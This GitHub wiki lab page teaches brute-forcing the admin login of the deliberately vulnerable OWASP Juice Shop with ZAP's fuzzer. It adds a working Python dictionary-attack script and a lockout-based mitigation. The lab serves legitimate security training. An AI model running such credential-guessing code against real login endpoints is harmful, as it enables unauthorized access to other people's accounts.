Lab 05 Broken Authentication - Muamaidbengt/juice-shop GitHub Wiki

Broken authentication

Challenge "Password strength"

One (naive) way to gain entry to a password-protected system is to simply try every possible password, for example by first trying "a", then "b", and so on until you reach "ZZZZZZZZZZ" or something similar. Since passwords are rarely chosen at random, you can speed up this time-consuming process by making more selective guesses: lists of the most commonly used passwords, of varying length, are easy to find. Fed to a fuzzer, each entry in such a list is tried for you, one request per candidate.

This lab assumes that the attacker (i.e. you) knows there is an admin account named [email protected], but doesn't know the password for it.

Preparations

  1. Download the password dictionary containing the top 100 most commonly used passwords to your computer.
  2. Start OWASP ZAP.
  3. Choose to manually explore your application.
  4. Launch Firefox with ZAP as a proxy by selecting Firefox in the dropdown and then clicking the "Launch Browser" button. This means that ZAP will intercept and analyze all traffic between your browser and the web server.

Record a login attempt in ZAP

  1. Enter your Juice Shop url.
  2. Go to the Login page and attempt to login using [email protected] as the username and replaceme as the password.
  3. Check the History tab in ZAP.
  4. Select the most recent HTTP POST request and inspect the request and response.

Use the recorded login attempt as a template

  1. Right click the POST request and choose Attack -> Fuzz.
  2. In the bottom-left section, you can see the Body of the HTTP POST request you triggered manually.
  3. In the Body, select the string replaceme and click Add. This marks the password value as the fuzz location, i.e. the part of the request that will be replaced on each attempt.
  4. In the Payloads dialog that opens, click Add and choose the payload type File, using the dictionary you downloaded in step 1 of the preparations as the source. This means ZAP will repeat the HTTP POST request once for each password in the dictionary (i.e. 100 times), leaving the rest of the request unchanged.

Use ZAP to perform a password brute force attack on the Juice Shop

  1. Start the Fuzzer and wait a couple of seconds for it to complete.
  2. The fuzzer output pane lists, for each request, the HTTP status code, the size of the response body and the payload (password) that was used.
  3. Check whether any of the fuzzed requests stands out. A wrong password produces the same error response every time (the same status code and roughly the same size), so a single request with a different status code or response size is the one worth inspecting.
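What the fuzzer does under the hood, written out as an added example that is not part of this lab or of Juice Shop: replay the login POST once per wordlist entry and flag every response whose status code or body size differs from the known-bad baseline (the replaceme attempt). The simulated server, the account admin@example.test and the five-word list are constructed so the script runs offline; the http_login helper assumes a JSON endpoint shaped like Juice Shop's /rest/user/login, and the localhost URL in the closing comment is an assumption.

```python
"""Dictionary attack against a login form, mirroring the ZAP fuzz run above.

Added example, not part of the original lab or of Juice Shop. The server URL
and the wordlist are assumptions; simulated_login is constructed so the
script runs offline.
"""
import json
import urllib.error
import urllib.request
from typing import Callable, Iterable, List, Tuple

# A login attempt returns (status_code, response_body).
LoginFn = Callable[[str, str], Tuple[int, str]]


def http_login(url: str) -> LoginFn:
    """Build a login function that POSTs JSON to a real endpoint.

    Assumption: the target accepts {"email": ..., "password": ...} as JSON,
    as Juice Shop's /rest/user/login does, and answers 401 on a wrong password.
    """
    def attempt(email: str, password: str) -> Tuple[int, str]:
        body = json.dumps({"email": email, "password": password}).encode()
        req = urllib.request.Request(
            url, data=body, headers={"Content-Type": "application/json"},
            method="POST")
        try:
            with urllib.request.urlopen(req, timeout=10) as resp:
                return resp.getcode(), resp.read().decode(errors="replace")
        except urllib.error.HTTPError as err:
            # 4xx/5xx arrive as exceptions; keep both status and body.
            return err.code, err.read().decode(errors="replace")
    return attempt


def simulated_login(valid: dict) -> LoginFn:
    """Constructed stand-in for the server: no throttling, no lockout."""
    def attempt(email: str, password: str) -> Tuple[int, str]:
        if valid.get(email) == password:
            return 200, json.dumps({"authentication": {"token": "<jwt>"}})
        return 401, "Invalid email or password."
    return attempt


def dictionary_attack(login: LoginFn, email: str, wordlist: Iterable[str],
                      baseline_password: str = "replaceme"
                      ) -> List[Tuple[str, int, int]]:
    """Try every candidate and report those whose response differs from baseline.

    Like the ZAP fuzzer, the comparison keys on status code and body length:
    a wrong password should look the same every time, so any deviation is
    interesting. All candidates are tried, not just up to the first hit.
    """
    base_status, base_body = login(email, baseline_password)
    hits = []
    for candidate in wordlist:
        status, body = login(email, candidate)
        if status != base_status or len(body) != len(base_body):
            hits.append((candidate, status, len(body)))
    return hits


# Constructed miniature wordlist (the lab uses a top-100 list).
SAMPLE_WORDLIST = ["123456", "password", "qwerty", "admin123", "letmein"]


def demo() -> List[Tuple[str, int, int]]:
    """Run the attack against the constructed server and account."""
    target = simulated_login({"admin@example.test": "admin123"})  # constructed
    return dictionary_attack(target, "admin@example.test", SAMPLE_WORDLIST)


if __name__ == "__main__":
    for password, status, length in demo():
        print(f"candidate {password!r}: HTTP {status}, {length} bytes")
    # Against a live instance (assumed URL), swap in:
    # http_login("http://localhost:3000/rest/user/login")
```

The baseline request matters: comparing against a fixed expectation such as "200 means success" breaks on applications that always answer 200 and signal failure only in the body, whereas a size-or-status diff against a known-bad attempt works in both cases.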

Questions

  • What is the password for [email protected]?
  • It's demonstrably possible to perform a brute-force attack to gain unauthorized access to the system. How could this vulnerability be mitigated in this type of application?
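One concrete answer to the second question, as an added example (not Juice Shop code): a per-account sliding-window lockout placed in front of the credential check. The thresholds (5 failures per 15 minutes), the constructed account and wordlist, and the fake clock are assumptions chosen for illustration.

```python
"""Per-account failed-login throttling, one mitigation for the attack above.

Added example, not Juice Shop code. The policy numbers (5 failures inside a
15-minute window) are assumptions; a real deployment would tune them and
store password hashes rather than the constructed plaintext below.
"""
import hmac
from collections import defaultdict, deque
from typing import Callable, Deque, Dict, List

MAX_FAILURES = 5          # failures allowed inside the window before locking
WINDOW_SECONDS = 15 * 60  # sliding window over which failures are counted


class FakeClock:
    """Constructed clock so the demo runs instantly and deterministically."""

    def __init__(self) -> None:
        self.now = 0.0

    def __call__(self) -> float:
        return self.now

    def advance(self, seconds: float) -> None:
        self.now += seconds


class LoginGuard:
    """Wraps a credential check with a sliding-window failure counter per account."""

    def __init__(self, verify: Callable[[str, str], bool],
                 clock: Callable[[], float]):
        self._verify = verify
        self._clock = clock  # injectable so tests can move time forward
        self._failures: Dict[str, Deque[float]] = defaultdict(deque)

    def _prune(self, email: str, now: float) -> None:
        """Drop failure timestamps that have aged out of the window."""
        window = self._failures[email]
        while window and now - window[0] >= WINDOW_SECONDS:
            window.popleft()

    def seconds_until_unlocked(self, email: str) -> float:
        now = self._clock()
        self._prune(email, now)
        window = self._failures[email]
        if len(window) < MAX_FAILURES:
            return 0.0
        return WINDOW_SECONDS - (now - window[0])

    def login(self, email: str, password: str) -> str:
        """Return 'ok', 'invalid' or 'locked'.

        'locked' is returned before the password is checked, so a locked
        account gives the attacker no signal about whether a guess was right.
        """
        if self.seconds_until_unlocked(email) > 0:
            return "locked"
        if self._verify(email, password):
            self._failures[email].clear()
            return "ok"
        self._failures[email].append(self._clock())
        return "invalid"


def demo() -> List[str]:
    """Run a constructed ten-word dictionary against a guarded account."""
    store = {"admin@example.test": "admin123"}  # constructed account

    def verify(email: str, password: str) -> bool:
        stored = store.get(email)
        # Constant-time comparison; a real store would compare bcrypt/argon2 hashes.
        return stored is not None and hmac.compare_digest(stored, password)

    guard = LoginGuard(verify, FakeClock())
    wordlist = ["123456", "password", "qwerty", "letmein", "welcome",
                "monkey", "dragon", "admin123", "iloveyou", "football"]
    return [guard.login("admin@example.test", word) for word in wordlist]


if __name__ == "__main__":
    for word, outcome in zip(range(1, 11), demo()):
        print(f"attempt {word}: {outcome}")
```

With these numbers the same 100-word dictionary costs an attacker 20 lockout windows, about five hours, instead of a couple of seconds, and the correct password at position 8 in the demo list is never even evaluated because the account is already locked. The caveat a practitioner would add: per-account lockout alone lets anyone who knows the admin's e-mail address lock the admin out, so it is normally combined with per-IP rate limiting, a CAPTCHA after a few failures and a second factor, and the failed attempts should be logged so a run like this one shows up in monitoring.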

Recommended reading